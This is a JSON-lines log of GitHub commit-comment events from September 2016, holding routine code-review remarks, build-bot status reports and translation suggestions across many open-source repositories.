{"id":"4633384091","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214672,"position":11,"line":11,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/DataOperationThread.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T21:03:04Z","updated_at":"2016-09-28T21:03:04Z","body":"Well this entire test is about simulating a \"real\" load, where you would have some form of \"data\", and you would add something, \"x\", to it. So \"x\" seems kind of fitting here to me since \"x\" represents anything here really. But do you have any suggestions on what to call it instead? :)"}},"created_at":"2016-09-28T21:03:04Z"}
{"id":"4633384882","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-mirebalais"},"payload":{"comment":{"id":19214673,"position":null,"line":null,"path":null,"commit_id":"a94a344789bf4cccffa4b2992124cbe4dfba7d23","created_at":"2016-09-28T21:03:12Z","updated_at":"2016-09-28T21:03:12Z","body":"ah, got it... ;)"}},"created_at":"2016-09-28T21:03:12Z"}
{"id":"4633385123","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI_Bunny"},"payload":{"comment":{"id":19214674,"position":null,"line":null,"path":null,"commit_id":"7b90941ce8d3d171b808d06a6950c92493bfc4b6","created_at":"2016-09-28T21:03:15Z","updated_at":"2016-09-28T21:03:15Z","body":"Or maybe it's more incentive to make people use ElvUI :) haha"}},"created_at":"2016-09-28T21:03:15Z"}
{"id":"4633387398","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214688,"position":19,"line":19,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/StabilityTest.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T21:03:39Z","updated_at":"2016-09-28T21:03:39Z","body":"Done"}},"created_at":"2016-09-28T21:03:39Z"}
{"id":"4633389812","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214690,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:04:06Z","updated_at":"2016-09-28T21:04:06Z","body":"Are you able to build with https://github.com/rstudio/rstudio/commit/2828a35e76901fa8a2cce42b55e8702a60db4132? (this just removes the type indirection)"}},"created_at":"2016-09-28T21:04:06Z"}
{"id":"4633390035","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214691,"position":4,"line":20,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutex.java","commit_id":"16e8b61f6d27520b951d3733d891fcaf51134d79","created_at":"2016-09-28T21:04:09Z","updated_at":"2016-09-28T21:04:09Z","body":":D"}},"created_at":"2016-09-28T21:04:09Z"}
{"id":"4633393642","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"zacharyacutey/Chess"},"payload":{"comment":{"id":19214697,"position":3,"line":3,"path":"main.d","commit_id":"b2755850160e090014b021e9461077df34b06503","created_at":"2016-09-28T21:04:47Z","updated_at":"2016-09-28T21:04:47Z","body":"LOL!\r\n@19smitgr SO SORRY ABOUT THAT"}},"created_at":"2016-09-28T21:04:47Z"}
{"id":"4633395438","type":"CommitCommentEvent","actor":{"login":"Malow"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19214700,"position":55,"line":55,"path":"src/test/java/com/mooo/malow/namedmutex/stabilitytest/StabilityTest.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-28T21:05:06Z","updated_at":"2016-09-28T21:05:06Z","body":"Haha, I actaully kinda prefer this one, less \"talky\" ^^"}},"created_at":"2016-09-28T21:05:06Z"}
{"id":"4633398906","type":"CommitCommentEvent","actor":{"login":"sam3000"},"repo":{"name":"sam3000/android_device_huawei_angler"},"payload":{"comment":{"id":19214711,"position":null,"line":null,"path":null,"commit_id":"bdd8a5c444b24d135f1f47a7f8ca0427eeca24ee","created_at":"2016-09-28T21:05:42Z","updated_at":"2016-09-28T21:05:42Z","body":"Hi,\r\n\r\nI haven't had time to test really anything yet.    So far, I've just focused on the basics to build and boot with rebased/squashed/cleaned cm-13 commits on top of aosp/nougat-release heads and doing a blobs refresh.\r\n\r\nI hope to spend some time looking at further this weekend."}},"created_at":"2016-09-28T21:05:42Z"}
{"id":"4633402197","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214720,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:06:19Z","updated_at":"2016-09-28T21:06:19Z","body":"Oops, I'm also seeing now that I had a typo here:\r\n\r\n```\r\ntypedef WkWebView RSWebView;\r\n```\r\n\r\n(should be `WKWebView`); so perhaps that's the culprit instead."}},"created_at":"2016-09-28T21:06:19Z"}
{"id":"4633406120","type":"CommitCommentEvent","actor":{"login":"brandyscarney"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19214732,"position":11,"line":330,"path":"CHANGELOG.md","commit_id":"26281a7a26ed5616e14361af6c9c546ef0f73117","created_at":"2016-09-28T21:06:57Z","updated_at":"2016-09-28T21:06:57Z","body":"@astec you should be using `npm 3` at a minimum. It should work fine with node 4.x+, we just want to emphasize that npm 3 is required. "}},"created_at":"2016-09-28T21:06:57Z"}
{"id":"4633410241","type":"CommitCommentEvent","actor":{"login":"shikhar"},"repo":{"name":"confluentinc/kafka-connect-elasticsearch"},"payload":{"comment":{"id":19214736,"position":119,"line":197,"path":"src/main/java/io/confluent/connect/elasticsearch/ElasticsearchWriter.java","commit_id":"7fdccb20836cbf707247da2e7086021015b17b4d","created_at":"2016-09-28T21:07:45Z","updated_at":"2016-09-28T21:07:45Z","body":"Moved this out of `DataConverter`, didn't make sense for `DataConverter` to be doing IO"}},"created_at":"2016-09-28T21:07:45Z"}
{"id":"4633417053","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214751,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:09:00Z","updated_at":"2016-09-28T21:09:00Z","body":"Shoot! I had to make this local change to unblock my build, so wasn't really meaning to push this in. Sounds like @kevinushey is taking care of this? I would revert my change for sure, but looks like we might want to take an additional fix. Kevin, you want me to revert this? Or do you want to push a fix that overrides this?"}},"created_at":"2016-09-28T21:09:00Z"}
{"id":"4633417385","type":"CommitCommentEvent","actor":{"login":"SoftwareRVG"},"repo":{"name":"SoftwareRVG/mde_design"},"payload":{"comment":{"id":19214752,"position":null,"line":null,"path":null,"commit_id":"c1433adced8f524132ca408a4767e286cc1e1fe4","created_at":"2016-09-28T21:09:04Z","updated_at":"2016-09-28T21:09:04Z","body":"\r\n### View on debug mode:\r\n### [mozilla developer edition design-css-svg-demo](http://s.codepen.io/SoftwareRVG/debug/JRJZVW)\r\n"}},"created_at":"2016-09-28T21:09:04Z"}
{"id":"4633418996","type":"CommitCommentEvent","actor":{"login":"eliotpearson"},"repo":{"name":"cmsc495-fall2016/cmsc495-fall2016.github.io"},"payload":{"comment":{"id":19214756,"position":null,"line":null,"path":null,"commit_id":"fa61c5e7555a4751166165e89a967ee770b1ed66","created_at":"2016-09-28T21:09:20Z","updated_at":"2016-09-28T21:09:20Z","body":"I will take a look in a bit."}},"created_at":"2016-09-28T21:09:20Z"}
{"id":"4633419695","type":"CommitCommentEvent","actor":{"login":"shamisp"},"repo":{"name":"openucx/ucx"},"payload":{"comment":{"id":19214759,"position":7,"line":364,"path":"src/uct/ib/base/ib_iface.c","commit_id":"ae5cad667bc3b517ea222f7548449abf0445f76a","created_at":"2016-09-28T21:09:29Z","updated_at":"2016-09-28T21:09:29Z","body":"I see problems with this patch. First of all you should not overwrite MLX5_CQE_SIZE if there is one set by user (like myself)."}},"created_at":"2016-09-28T21:09:29Z"}
{"id":"4633422111","type":"CommitCommentEvent","actor":{"login":"capooti"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19214766,"position":null,"line":null,"path":null,"commit_id":"14e9887736c0101eaa99b1bbae627c9ff9cecae7","created_at":"2016-09-28T21:09:55Z","updated_at":"2016-09-28T21:09:55Z","body":"note that production is now 101 commits behind master"}},"created_at":"2016-09-28T21:09:55Z"}
{"id":"4633423514","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214770,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:10:11Z","updated_at":"2016-09-28T21:10:11Z","body":"Ah, Jonathan already reverted this, I'm glad."}},"created_at":"2016-09-28T21:10:11Z"}
{"id":"4633428089","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214783,"position":59,"line":59,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:10:57Z","updated_at":"2016-09-28T21:10:57Z","body":"don't use vars and `**` if you're explaining this to a beginner. make it 100% explicit."}},"created_at":"2016-09-28T21:10:57Z"}
{"id":"4633429138","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214785,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:11:08Z","updated_at":"2016-09-28T21:11:08Z","body":"Wait, so we _do_ need the indirection? I'm obviously confused here -- do we need `WKWebView` on the Mavericks / El Capitan machines?"}},"created_at":"2016-09-28T21:11:08Z"}
{"id":"4633430510","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214790,"position":56,"line":56,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:11:22Z","updated_at":"2016-09-28T21:11:22Z","body":"if not needed, remove."}},"created_at":"2016-09-28T21:11:22Z"}
{"id":"4633430796","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19214791,"position":null,"line":null,"path":null,"commit_id":"97ef687f24b5efc7783d551c5e1fb793f56da578","created_at":"2016-09-28T21:11:24Z","updated_at":"2016-09-28T21:11:24Z","body":"[Flask-WTF docs](https://flask-wtf.readthedocs.io/en/latest/)\r\n\r\nIn this commit (for Flask-WTF):\r\n- Install Flask-WTF\r\n- Create LoginForm and SignupForm\r\n- Add/update login and signup views/templates to use\r\n\r\nIn this commit (not related to Flask-WTF):\r\n- Update configuration (use `app.config.from_object`)\r\n- Add `save` method to User class\r\n"}},"created_at":"2016-09-28T21:11:24Z"}
{"id":"4633431611","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214793,"position":45,"line":45,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:11:33Z","updated_at":"2016-09-28T21:11:33Z","body":"use print statements instead of file handling"}},"created_at":"2016-09-28T21:11:33Z"}
{"id":"4633433454","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19214802,"position":null,"line":null,"path":null,"commit_id":"483d24bac0b882d747dcae69d984c55b757b4d52","created_at":"2016-09-28T21:11:52Z","updated_at":"2016-09-28T21:11:52Z","body":"++"}},"created_at":"2016-09-28T21:11:52Z"}
{"id":"4633435433","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214811,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:12:12Z","updated_at":"2016-09-28T21:12:12Z","body":"What version of Xcode / OS X are you using, @javierluraschi?"}},"created_at":"2016-09-28T21:12:12Z"}
{"id":"4633435593","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214812,"position":25,"line":25,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:12:14Z","updated_at":"2016-09-28T21:12:14Z","body":"we don't use standard, we use table 11."}},"created_at":"2016-09-28T21:12:14Z"}
{"id":"4633439172","type":"CommitCommentEvent","actor":{"login":"rainman110"},"repo":{"name":"DLR-SC/tigl"},"payload":{"comment":{"id":19214821,"position":null,"line":null,"path":null,"commit_id":"d706e80c95dd09db459dd6dbfd692842da2cdefc","created_at":"2016-09-28T21:12:52Z","updated_at":"2016-09-28T21:12:52Z","body":"@jf--- My idea is, to misuse conda for creating reproducible binary installable packages.\r\n\r\nConda can do for C++, what Maven does for Java: explicitly defining the dependencies (exact versions) and provide the build scripts and settings. My ultimate goal is, to allow exact binary reproducibility. I.e. if you would create a TiGL release, you will get exactly the same binary as when I am building it.\r\n\r\nTo minimize the number of files shipped with our package, I am linking statically as many libs as possible. This also allows reducing the size of the installer in the end.\r\n\r\nCurrently, I am just playing around with the idea. But I think, conda offers a great environment for this use case."}},"created_at":"2016-09-28T21:12:52Z"}
{"id":"4633439341","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19214822,"position":null,"line":null,"path":null,"commit_id":"0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3","created_at":"2016-09-28T21:12:53Z","updated_at":"2016-09-28T21:12:53Z","body":"I can only find this now:\r\n\r\nhttps://github.com/manjaro/manjaro-tools/commit/274c4f1707dda2c4a4498336a4adb5478f033ef7\r\nhttps://github.com/manjaro/manjaro-tools-livecd/commit/d43db160e625288fd836823b0608db57cf13cd3a\r\n\r\nSo we have to check how **qt5ct** gets configured now ..."}},"created_at":"2016-09-28T21:12:53Z"}
{"id":"4633439781","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214824,"position":33,"line":33,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:12:58Z","updated_at":"2016-09-28T21:12:58Z","body":"use fasta + seqIO"}},"created_at":"2016-09-28T21:12:58Z"}
{"id":"4633443476","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214843,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:13:38Z","updated_at":"2016-09-28T21:13:38Z","body":"El Capitan + XCode `7.3.1`. Which is weird since that is the old configuration I was working on... BUT, I did upgrade to XCode `8.0` at some point and then reverted back. Let me kick a build and share the error with you."}},"created_at":"2016-09-28T21:13:38Z"}
{"id":"4633445668","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214849,"position":36,"line":36,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:14:01Z","updated_at":"2016-09-28T21:14:01Z","body":"instead of looping through and finding those that are a snp away, do the looping + printing at once. It'll be clearer that you're looking one amino acid at a time and then reacting on that, whether or not to print."}},"created_at":"2016-09-28T21:14:01Z"}
{"id":"4633448327","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214854,"position":48,"line":48,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:14:27Z","updated_at":"2016-09-28T21:14:27Z","body":"consider .lower() and .upper() instead of the string formatting. Additionally you've overescaped the `'` char, the `\\` can be removed."}},"created_at":"2016-09-28T21:14:27Z"}
{"id":"4633448515","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19214856,"position":null,"line":null,"path":null,"commit_id":"1d92e338c264c5af0734a4dc4c121be9a086ef2a","created_at":"2016-09-28T21:14:29Z","updated_at":"2016-09-28T21:14:29Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2284 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.47%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T21:14:29Z"}
{"id":"4633448739","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19214857,"position":null,"line":null,"path":null,"commit_id":"85772dfa074a8f0e41bfa7f91e783cef774983f5","created_at":"2016-09-28T21:14:32Z","updated_at":"2016-09-28T21:14:32Z","body":"++"}},"created_at":"2016-09-28T21:14:32Z"}
{"id":"4633452163","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"sgalkina/raytracer"},"payload":{"comment":{"id":19214868,"position":null,"line":null,"path":null,"commit_id":"283a3fdc06637e9503ff81fe620e68f45d719409","created_at":"2016-09-28T21:15:09Z","updated_at":"2016-09-28T21:15:09Z","body":":+1: "}},"created_at":"2016-09-28T21:15:09Z"}
{"id":"4633452672","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214871,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:15:14Z","updated_at":"2016-09-28T21:15:14Z","body":"Here's a fix that's gross, but it should definitely work. https://github.com/rstudio/rstudio/commit/38ffef339eb60c761236ddb8196881461403cbfe"}},"created_at":"2016-09-28T21:15:14Z"}
{"id":"4633454685","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214875,"position":33,"line":33,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:15:34Z","updated_at":"2016-09-28T21:15:34Z","body":"Also we should really push people to use standard formats like fasta and ensure that they know what a fasta file looks like."}},"created_at":"2016-09-28T21:15:34Z"}
{"id":"4633455364","type":"CommitCommentEvent","actor":{"login":"stovorov"},"repo":{"name":"stovorov/presentations"},"payload":{"comment":{"id":19214878,"position":null,"line":null,"path":null,"commit_id":"681c07a7e572a3f2616f25efbe0eaf4162921b27","created_at":"2016-09-28T21:15:41Z","updated_at":"2016-09-28T21:15:41Z","body":"List, Tuple, Dict under the hood"}},"created_at":"2016-09-28T21:15:41Z"}
{"id":"4633463204","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214897,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:17:03Z","updated_at":"2016-09-28T21:17:03Z","body":"Ran `CMAKE` + full build:\r\n\r\n```\r\n/Users/javierluraschi/RStudio/rstudio/src/cpp/desktop-mac/GwtCallbacks.mm:320: error: cannot initialize a variable of type 'WebView *' with an rvalue of type 'WKWebView * _Nullable'\r\n   WebView* view = [[[NSApp mainWindow] windowController] webView];\r\n            ^      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n```"}},"created_at":"2016-09-28T21:17:03Z"}
{"id":"4633465701","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"elenimijalis/one_snp_away"},"payload":{"comment":{"id":19214903,"position":7,"line":7,"path":"script.py","commit_id":"64a9c4f6d28ae22a1b1063ede7502041561f984e","created_at":"2016-09-28T21:17:29Z","updated_at":"2016-09-28T21:17:29Z","body":"Instead of this, maybe consider building up a table at the very beginning of all the possible amino acids that are one base change away.\r\n\r\nIt'll be clear why you're doing that (\"we need to find all the possible changes with a SNP\"), you can print out the table so that they can see what it looks like, etc.\r\n\r\nThen when you're testing in this function it'll be as simple as `if current_residue in snp_residues`"}},"created_at":"2016-09-28T21:17:29Z"}
{"id":"4633466865","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19214905,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:17:41Z","updated_at":"2016-09-28T21:17:41Z","body":"I'll try that fix..."}},"created_at":"2016-09-28T21:17:41Z"}
{"id":"4633467079","type":"CommitCommentEvent","actor":{"login":"bluestarla"},"repo":{"name":"bluestarla/libraryworkshopdemo"},"payload":{"comment":{"id":19214906,"position":null,"line":null,"path":null,"commit_id":"22af507f48e5c36469d25b8afe0aabc4412d5524","created_at":"2016-09-28T21:17:43Z","updated_at":"2016-09-28T21:17:43Z","body":"I was testing the commit function out."}},"created_at":"2016-09-28T21:17:43Z"}
{"id":"4633471714","type":"CommitCommentEvent","actor":{"login":"MeirionHughes"},"repo":{"name":"MeirionHughes/aurelia-template-lint"},"payload":{"comment":{"id":19214913,"position":23,"line":1336,"path":"spec/binding.spec.ts","commit_id":"87a177ae710b49178221897c6e2e63138f1b55ae","created_at":"2016-09-28T21:18:31Z","updated_at":"2016-09-28T21:18:31Z","body":"aye. noticed that after push too. I'll get it to fail in #121. "}},"created_at":"2016-09-28T21:18:31Z"}
{"id":"4633475905","type":"CommitCommentEvent","actor":{"login":"Maujor"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19214920,"position":null,"line":null,"path":null,"commit_id":"24176a5dd228ceee79522129ff979a9a0d70d577","created_at":"2016-09-28T21:19:18Z","updated_at":"2016-09-28T21:19:18Z","body":"Sugestão:\r\nNesta e em todas as traduções deste projeto traduzir **guide** para **tutorial**."}},"created_at":"2016-09-28T21:19:18Z"}
{"id":"4633478043","type":"CommitCommentEvent","actor":{"login":"Ales2003"},"repo":{"name":"Ales2003/ConvectorProject"},"payload":{"comment":{"id":19214930,"position":18,"line":185,"path":"src/ru/mail/ales_2003/convector/gui/EditConvectorDialog.java","commit_id":"d3451c06cc605622dc21b359640725472962e0ae","created_at":"2016-09-28T21:19:42Z","updated_at":"2016-09-28T21:19:42Z","body":"присваиваем -1"}},"created_at":"2016-09-28T21:19:42Z"}
{"id":"4633480214","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19214933,"position":null,"line":null,"path":null,"commit_id":"1d92e338c264c5af0734a4dc4c121be9a086ef2a","created_at":"2016-09-28T21:20:05Z","updated_at":"2016-09-28T21:20:05Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T21:20:05Z"}
{"id":"4633482166","type":"CommitCommentEvent","actor":{"login":"andela-joyebanji"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19214939,"position":16,"line":11,"path":"src/index.js","commit_id":"2a2acd259faca07749c8cb30411e054359640b11","created_at":"2016-09-28T21:20:23Z","updated_at":"2016-09-28T21:20:23Z","body":"It would better if the check is done on the properties and not the object as a whole. \r\nImagine if an empty config is passed? The results of `offset` and `limit` would be `undefined`.\r\nI'll suggest you do something like. `let offset = config.offset || 0;` .. same for `limit`"}},"created_at":"2016-09-28T21:20:23Z"}
{"id":"4633483824","type":"CommitCommentEvent","actor":{"login":"shamisp"},"repo":{"name":"openucx/ucx"},"payload":{"comment":{"id":19214942,"position":7,"line":364,"path":"src/uct/ib/base/ib_iface.c","commit_id":"ae5cad667bc3b517ea222f7548449abf0445f76a","created_at":"2016-09-28T21:20:40Z","updated_at":"2016-09-28T21:20:40Z","body":"And I don't think inl has to force towards overwriting user defines MLX5_CQE_SIZE...it should just fail and report useful message "}},"created_at":"2016-09-28T21:20:40Z"}
{"id":"4633484087","type":"CommitCommentEvent","actor":{"login":"pedrosnk"},"repo":{"name":"backstage/functions"},"payload":{"comment":{"id":19214944,"position":110,"line":102,"path":"lib/sandbox.js","commit_id":"f00f854ebf4d12e5bb93e1929d4c35e48977833f","created_at":"2016-09-28T21:20:43Z","updated_at":"2016-09-28T21:20:43Z","body":"Does private functions need to start with underscore?"}},"created_at":"2016-09-28T21:20:43Z"}
{"id":"4633491001","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19214955,"position":null,"line":null,"path":null,"commit_id":"2ca60b2b9f8df2916cb86a07afc3c491cde2b88d","created_at":"2016-09-28T21:21:56Z","updated_at":"2016-09-28T21:21:56Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2ca60b2b9f8df2916cb86a07afc3c491cde2b88d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2ca60b2b9f8df2916cb86a07afc3c491cde2b88d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T21:21:56Z"}
{"id":"4633491886","type":"CommitCommentEvent","actor":{"login":"andela-joyebanji"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19214957,"position":51,"line":37,"path":"src/index.js","commit_id":"2a2acd259faca07749c8cb30411e054359640b11","created_at":"2016-09-28T21:22:06Z","updated_at":"2016-09-28T21:22:06Z","body":"Duplicate promise. why not store the promise in a variable and return it in both cases?"}},"created_at":"2016-09-28T21:22:06Z"}
{"id":"4633498619","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19214970,"position":null,"line":null,"path":null,"commit_id":"78058b2cd750a430226eb85ca74b848ac03d5fa6","created_at":"2016-09-28T21:23:15Z","updated_at":"2016-09-28T21:23:15Z","body":"Fixed by https://github.com/gradle/gradle/commit/af83d86c9cfe4b02ce0d8d9de22c00dc6df75fd7"}},"created_at":"2016-09-28T21:23:15Z"}
{"id":"4633498708","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19214971,"position":24,"line":91,"path":"src/compiler/crystal/command/format.cr","commit_id":"a20f45ac2feb35ed3f54ac71df53bc369f18a333","created_at":"2016-09-28T21:23:16Z","updated_at":"2016-09-28T21:23:16Z","body":"Is string interpolation needed here? `puts ex.message` might suffice."}},"created_at":"2016-09-28T21:23:16Z"}
{"id":"4633500748","type":"CommitCommentEvent","actor":{"login":"nickguerra"},"repo":{"name":"nickguerra/workshop"},"payload":{"comment":{"id":19214978,"position":null,"line":null,"path":null,"commit_id":"63ecb99a847f3244386e5a527f9e3200cfff9656","created_at":"2016-09-28T21:23:38Z","updated_at":"2016-09-28T21:23:38Z","body":"lets test again.."}},"created_at":"2016-09-28T21:23:38Z"}
{"id":"4633504659","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/cdgen-ubk"},"payload":{"comment":{"id":19214983,"position":null,"line":null,"path":null,"commit_id":"eb1db1976d3e8777ee7390fd957f2f36302e98b8","created_at":"2016-09-28T21:24:23Z","updated_at":"2016-09-28T21:24:23Z","body":"The following packages are mentioned in packages_cd.txt\r\nbut are not available:\r\n  fonts-x.org-100dpi-iso-10646\r\n  fonts-x.org-100dpi-other\r\n  fonts-x.org-75dpi-iso-10646\r\n  fonts-x.org-75dpi-other\r\n  fonts-x.org-misc-iso-10646\r\n  fonts-x.org-misc-iso-8859-1\r\n  fonts-x.org-misc-other\r\nPlease fix it!\r\n"}},"created_at":"2016-09-28T21:24:23Z"}
{"id":"4633507932","type":"CommitCommentEvent","actor":{"login":"Maujor"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19214986,"position":null,"line":null,"path":null,"commit_id":"8760ef3d9d7b475b9f818a8713d4ac2570c3fef7","created_at":"2016-09-28T21:24:58Z","updated_at":"2016-09-28T21:24:58Z","body":"Sugestão:\r\nNesta e em todas as traduções nas quais for dado o crédito ao criador do tutorial acrescentar crédito também ao tradutor como mostrado a seguir:\r\n\r\n*Criado por Vesa Vänskä, [@vesan](https://twitter.com/vesan)*\r\n*Traduzido por Maujor, [Site do Maujor](https://maujor.com)* "}},"created_at":"2016-09-28T21:24:58Z"}
